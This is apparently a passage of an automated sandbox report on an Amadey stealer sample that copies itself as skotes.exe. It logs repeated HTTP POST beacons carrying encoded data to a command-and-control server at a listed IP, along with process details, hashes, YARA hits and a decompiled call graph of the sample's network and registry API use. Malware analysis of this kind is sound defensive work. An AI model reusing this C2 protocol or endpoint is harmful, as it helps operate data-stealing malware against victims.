                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:18.766311884 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.849733185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:20.650302887 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:22.023087025 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.849734185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:23.714600086 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:25.114605904 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.849735185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:26.877865076 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:28.272814035 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.849736185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:29.901704073 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:31.302551985 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.849737185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:33.060070038 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:34.413427114 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.849738185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:36.042746067 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:37.387913942 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.849739185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:39.134449005 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:40.515144110 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.849740185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:42.151180029 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:43.533092022 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.849741185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:45.277729988 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:46.657111883 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:11:12:40
                                              Start date:22/11/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x4f0000
                                              File size:1'922'048 bytes
                                              MD5 hash:9DDBAC8AABA1C5BB2F9A22717A60A6BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1423354567.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1463607272.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:11:12:44
                                              Start date:22/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                              Imagebase:0x720000
                                              File size:1'922'048 bytes
                                              MD5 hash:9DDBAC8AABA1C5BB2F9A22717A60A6BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1497759494.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1457117559.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 50%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:11:12:46
                                              Start date:22/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Imagebase:0x720000
                                              File size:1'922'048 bytes
                                              MD5 hash:9DDBAC8AABA1C5BB2F9A22717A60A6BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.1466497850.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.1507039683.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:11:13:00
                                              Start date:22/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              Imagebase:0x720000
                                              File size:1'922'048 bytes
                                              MD5 hash:9DDBAC8AABA1C5BB2F9A22717A60A6BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.1611788887.0000000004970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 04F10566 Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1467474246.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc678b4c1a0fb215d7b5578b13efd8e465420a3fddd258cdaa81e6693fe31f32
                                                • Instruction ID: c88550726a3427b76281d8d351438a467de5ed9fb3f60c7cb8c136b1edf74473
                                                • Opcode Fuzzy Hash: fc678b4c1a0fb215d7b5578b13efd8e465420a3fddd258cdaa81e6693fe31f32
                                                • Instruction Fuzzy Hash: CA0175EB2891207C714191923F28EFBA76DE1D2770331C82BF403D0846E6891A9E2032
                                                Function 04F10577 Relevance: .1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1467474246.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0600fa2028a0c0cd6ad6221492478d3e1578843049e268e75e50df91dcac9605
                                                • Instruction ID: 433864ce851fb931030d9e8732e3fe4cfa68580e3213bb0fe320fce1f35bd468
                                                • Opcode Fuzzy Hash: 0600fa2028a0c0cd6ad6221492478d3e1578843049e268e75e50df91dcac9605
                                                • Instruction Fuzzy Hash: 6611BCEB60D0507CB20281923F58EFB6B2DE5C3730331886BF403C9412E6890E8F6232
                                                Function 04F105A8 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1467474246.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e14adc5d22b5f7c7d1f450bf9d9c36c44c17052869fda3846bf9916d56e6f767
                                                • Instruction ID: 532ff07647650cade2e3d627877a17e9d81e0996dd760b2adfb1098b3764e52a
                                                • Opcode Fuzzy Hash: e14adc5d22b5f7c7d1f450bf9d9c36c44c17052869fda3846bf9916d56e6f767
                                                • Instruction Fuzzy Hash: F9F054FB24E0647C7051D1923F28EFB976DE1C2B71331C82BF802D0846E6890E9E6132

                                                Execution Graph

                                                Execution Coverage:6.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:12%
                                                Total number of Nodes:325
                                                Total number of Limit Nodes:6
                                                execution_graph 11939 727430 11940 727465 shared_ptr 11939->11940 11944 72755f shared_ptr 11940->11944 11945 73d111 11940->11945 11942 7275ed 11942->11944 11949 73d0c7 11942->11949 11948 73d122 11945->11948 11947 73d12a 11947->11942 11948->11947 11953 73d199 11948->11953 11950 73d0d7 11949->11950 11951 73d17f 11950->11951 11952 73d17b RtlWakeAllConditionVariable 11950->11952 11951->11944 11952->11944 11954 73d1a7 SleepConditionVariableCS 11953->11954 11956 73d1c0 11953->11956 11954->11956 11956->11948 12116 72e0c0 recv 12117 72e122 recv 12116->12117 12118 72e157 recv 12117->12118 12120 72e191 12118->12120 12119 72e2b3 12120->12119 12121 73c6ac GetSystemTimePreciseAsFileTime 12120->12121 12122 72e2ee 12121->12122 12123 73c26a 3 API calls 12122->12123 12124 72e358 12123->12124 11829 731ec0 11832 731f5b shared_ptr __dosmaperr 11829->11832 11830 72e530 6 API calls 11831 732a26 shared_ptr std::_Xinvalid_argument 11830->11831 11832->11831 11833 731f68 11832->11833 11834 7328c1 11832->11834 11833->11830 11838 72e530 11834->11838 11836 732933 11836->11831 11854 725ee0 11836->11854 11839 72e576 11838->11839 11861 72be30 11839->11861 11841 72ea8f shared_ptr 11841->11836 11842 72e7fe 11842->11841 11843 72e530 6 API calls 11842->11843 11845 72f786 11843->11845 11844 72f982 shared_ptr 11844->11836 11845->11844 11846 72e530 6 API calls 11845->11846 11848 72fa63 11846->11848 11847 72fb35 shared_ptr 11847->11836 11848->11847 11849 72e530 6 API calls 11848->11849 11851 73063c 11849->11851 11850 730880 shared_ptr 11850->11836 11851->11850 11852 72e530 6 API calls 11851->11852 11853 7312e9 11852->11853 11855 725f18 11854->11855 11856 725ffe shared_ptr 11855->11856 11857 726150 RegOpenKeyExA 11855->11857 11856->11831 11859 726493 shared_ptr 11857->11859 11860 7261a3 __cftof 11857->11860 11858 726243 RegEnumValueA 11858->11860 11859->11831 11860->11858 11860->11859 11862 72be82 11861->11862 11865 72c22e shared_ptr 11861->11865 11863 72be96 Sleep InternetOpenW InternetConnectA 11862->11863 11862->11865 11864 72bf18 11863->11864 11866 72bf2e HttpOpenRequestA 11864->11866 11865->11842 11867 72bf4c shared_ptr 11866->11867 11868 72bfee HttpSendRequestA 11867->11868 11870 72c006 shared_ptr 11868->11870 11869 72c08e InternetReadFile 11871 72c0b5 11869->11871 11870->11869 11872 736c70 11873 736ca0 11872->11873 11876 7347b0 11873->11876 11875 736cec Sleep 11875->11873 11879 7347eb 11876->11879 11891 734e70 shared_ptr 11876->11891 11877 734f59 shared_ptr 11877->11875 11880 72be30 6 API calls 11879->11880 11879->11891 11890 734843 shared_ptr __dosmaperr 11880->11890 11881 735015 shared_ptr 11882 7350de shared_ptr 11881->11882 11886 736c46 11881->11886 11906 727d30 11882->11906 11884 7350ed 11910 728380 11884->11910 11887 7347b0 11 API calls 11886->11887 11889 736cec Sleep 11887->11889 11888 72be30 6 API calls 11892 734b62 shared_ptr 11888->11892 11889->11886 11890->11888 11890->11891 11891->11877 11902 7265e0 11891->11902 11892->11891 11895 734390 11892->11895 11894 735106 shared_ptr 11894->11875 11896 7343d2 11895->11896 11897 734646 11896->11897 11900 7343f8 shared_ptr 11896->11900 11899 733640 8 API calls 11897->11899 11898 734610 shared_ptr 11898->11891 11899->11898 11900->11898 11914 733640 11900->11914 11905 4b40b32 11902->11905 11903 72663f LookupAccountNameA 11904 726692 shared_ptr 11903->11904 11904->11881 11905->11903 11907 727d96 shared_ptr __cftof 11906->11907 11908 727ed3 GetNativeSystemInfo 11907->11908 11909 727ed7 shared_ptr 11907->11909 11908->11909 11909->11884 11911 7283e5 shared_ptr __cftof 11910->11911 11912 728524 GetNativeSystemInfo 11911->11912 11913 728403 11911->11913 11912->11913 11913->11894 11915 73367f shared_ptr __dosmaperr 11914->11915 11918 733ba2 shared_ptr std::_Xinvalid_argument 11914->11918 11916 733f42 11915->11916 11915->11918 11919 733c8d 11915->11919 11930 732f10 11916->11930 11918->11900 11921 731ec0 11919->11921 11924 731f5b shared_ptr __dosmaperr 11921->11924 11922 72e530 6 API calls 11923 732a26 shared_ptr std::_Xinvalid_argument 11922->11923 11923->11918 11924->11923 11925 731f68 11924->11925 11926 7328c1 11924->11926 11925->11922 11927 72e530 6 API calls 11926->11927 11928 732933 11927->11928 11928->11923 11929 725ee0 2 API calls 11928->11929 11929->11923 11931 732f54 11930->11931 11932 72e530 6 API calls 11931->11932 11934 733513 shared_ptr __dosmaperr 11932->11934 11933 73360a shared_ptr std::_Xinvalid_argument 11933->11918 11934->11933 11935 733f42 11934->11935 11937 733c8d 11934->11937 11936 732f10 8 API calls 11935->11936 11936->11933 11938 731ec0 8 API calls 11937->11938 11938->11933 11972 73a210 11973 73a290 11972->11973 11979 7371d0 11973->11979 11975 73a2cc shared_ptr 11976 73a4be shared_ptr 11975->11976 11983 723ee0 11975->11983 11978 73a4a6 11981 737211 __cftof 11979->11981 11980 737446 11980->11975 11981->11980 11989 722ec0 11981->11989 11984 723f48 11983->11984 11988 723f1e 11983->11988 11985 723f58 11984->11985 12086 722c00 11984->12086 11985->11978 11988->11978 11990 722f06 11989->11990 11995 722f6f 11989->11995 12023 73c6ac 11990->12023 11993 72301e 12026 73c26a 11993->12026 11994 722fef 11994->11980 11995->11994 12000 73c6ac GetSystemTimePreciseAsFileTime 11995->12000 11997 723024 11998 73c26a 3 API calls 11997->11998 12001 722fb9 11998->12001 11999 722f1d __Mtx_unlock 11999->11995 11999->11997 12000->12001 12002 73c26a 3 API calls 12001->12002 12003 722fc0 __Mtx_unlock 12001->12003 12002->12003 12004 73c26a 3 API calls 12003->12004 12005 722fd8 __Cnd_broadcast 12003->12005 12004->12005 12005->11994 12006 73c26a 3 API calls 12005->12006 12007 72303c 12006->12007 12008 73c6ac GetSystemTimePreciseAsFileTime 12007->12008 12018 723080 shared_ptr __Mtx_unlock 12008->12018 12009 7231c5 12010 73c26a 3 API calls 12009->12010 12011 7231cb 12010->12011 12012 73c26a 3 API calls 12011->12012 12013 7231d1 12012->12013 12014 73c26a 3 API calls 12013->12014 12020 723193 __Mtx_unlock 12014->12020 12015 7231a7 12015->11980 12016 73c26a 3 API calls 12017 7231dd 12016->12017 12018->12009 12018->12011 12018->12015 12019 73c6ac GetSystemTimePreciseAsFileTime 12018->12019 12021 72315f 12019->12021 12020->12015 12020->12016 12021->12009 12021->12013 12021->12020 12030 73bd4c 12021->12030 12033 73c452 12023->12033 12025 722f12 12025->11993 12025->11999 12027 73c292 12026->12027 12028 73c274 12026->12028 12027->12027 12028->12027 12050 73c297 12028->12050 12080 73bb72 12030->12080 12032 73bd5c 12032->12021 12034 73c4a8 12033->12034 12036 73c47a 12033->12036 12034->12036 12039 73cf6b 12034->12039 12036->12025 12037 73c4fd __Xtime_diff_to_millis2 12037->12036 12038 73cf6b _xtime_get GetSystemTimePreciseAsFileTime 12037->12038 12038->12037 12040 73cf7a 12039->12040 12042 73cf87 __aulldvrm 12039->12042 12040->12042 12043 73cf44 12040->12043 12042->12037 12046 73cbea 12043->12046 12047 73cbfb GetSystemTimePreciseAsFileTime 12046->12047 12049 73cc07 12046->12049 12047->12049 12049->12042 12053 722ae0 12050->12053 12052 73c2ae std::_Throw_future_error 12052->12028 12059 73bedf 12053->12059 12055 722aff 12055->12052 12056 722af4 12056->12055 12062 758bec 12056->12062 12058 756cf6 12068 73cc31 12059->12068 12063 758bf1 12062->12063 12066 758bfc 12063->12066 12072 75d634 12063->12072 12077 7565ed 12066->12077 12067 758c2f __dosmaperr 12067->12058 12069 73cc3f InitOnceExecuteOnce 12068->12069 12071 73bef2 12068->12071 12069->12071 12071->12056 12073 75d640 12072->12073 12074 7565ed 2 API calls 12073->12074 12075 75d69c __cftof __dosmaperr 12073->12075 12076 75d82e __dosmaperr 12074->12076 12075->12066 12076->12066 12078 7564c7 2 API calls 12077->12078 12079 7565fe 12078->12079 12079->12067 12081 73bb9c 12080->12081 12082 73cf6b _xtime_get GetSystemTimePreciseAsFileTime 12081->12082 12083 73bba4 __Xtime_diff_to_millis2 12081->12083 12084 73bbcf __Xtime_diff_to_millis2 12082->12084 12083->12032 12084->12083 12085 73cf6b _xtime_get GetSystemTimePreciseAsFileTime 12084->12085 12085->12083 12087 722c0e 12086->12087 12093 73b847 12087->12093 12089 722c42 12090 722c49 12089->12090 12099 722c80 12089->12099 12090->11978 12092 722c58 std::_Throw_future_error 12094 73b854 12093->12094 12095 73b873 Concurrency::details::_Reschedule_chore 12093->12095 12102 73cb77 12094->12102 12095->12089 12097 73b864 12097->12095 12104 73b81e 12097->12104 12110 73b7fb 12099->12110 12101 722cb2 shared_ptr 12101->12092 12103 73cb92 CreateThreadpoolWork 12102->12103 12103->12097 12105 73b827 Concurrency::details::_Reschedule_chore 12104->12105 12108 73cdcc 12105->12108 12107 73b841 12107->12095 12109 73cde1 TpPostWork 12108->12109 12109->12107 12111 73b807 12110->12111 12113 73b817 12110->12113 12111->12113 12114 73ca78 12111->12114 12113->12101 12115 73ca8d TpReleaseWork 12114->12115 12115->12113 12164 7393e0 12165 7393f5 12164->12165 12169 739433 12164->12169 12166 73d111 SleepConditionVariableCS 12165->12166 12167 7393ff 12166->12167 12168 73d0c7 RtlWakeAllConditionVariable 12167->12168 12167->12169 12168->12169 12170 7387d0 12171 73882a __cftof 12170->12171 12177 739bb0 12171->12177 12173 738854 12174 73886c 12173->12174 12181 7243f0 12173->12181 12176 7388d9 std::_Throw_future_error 12178 739be5 12177->12178 12187 722ce0 12178->12187 12180 739c16 12180->12173 12182 73bedf InitOnceExecuteOnce 12181->12182 12183 72440a 12182->12183 12184 724411 12183->12184 12185 756cbb 2 API calls 12183->12185 12184->12176 12186 724424 12185->12186 12188 722d1d 12187->12188 12189 73bedf InitOnceExecuteOnce 12188->12189 12190 722d46 12189->12190 12191 722d51 12190->12191 12192 722d88 12190->12192 12196 73bef7 12190->12196 12191->12180 12203 722440 12192->12203 12197 73bf03 std::_Throw_future_error 12196->12197 12198 73bf73 12197->12198 12199 73bf6a 12197->12199 12201 722ae0 3 API calls 12198->12201 12206 73be7f 12199->12206 12202 73bf6f 12201->12202 12202->12192 12216 73b5d6 12203->12216 12205 722472 12207 73cc31 